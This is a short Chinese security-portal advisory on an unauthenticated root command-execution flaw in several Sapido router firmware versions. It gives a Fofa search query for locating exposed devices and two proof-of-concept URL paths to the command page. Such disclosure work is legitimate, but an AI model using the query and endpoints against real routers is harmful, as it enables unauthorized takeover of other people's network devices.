官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
Sapido多款路由器命令执行漏洞
- 关注
收藏一下~
可以收录到专辑噢~
Sapido多款路由器命令执行漏洞
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
漏洞简介
Sapido路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以root权限执行任意命令。
http://www.sapido.com.tw/TC/home.htm
影响版本
BR270n-v2.1.03
BRC76n-v2.1.03
GR297-v2.1.3
RB1732-v2.0.43
漏洞复现
Fofa:app="Sapido-路由器"
登录页面
**POC
http://x.x.x.x/syscmd.asp
http://x.x.x.x/syscmd.htm**
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者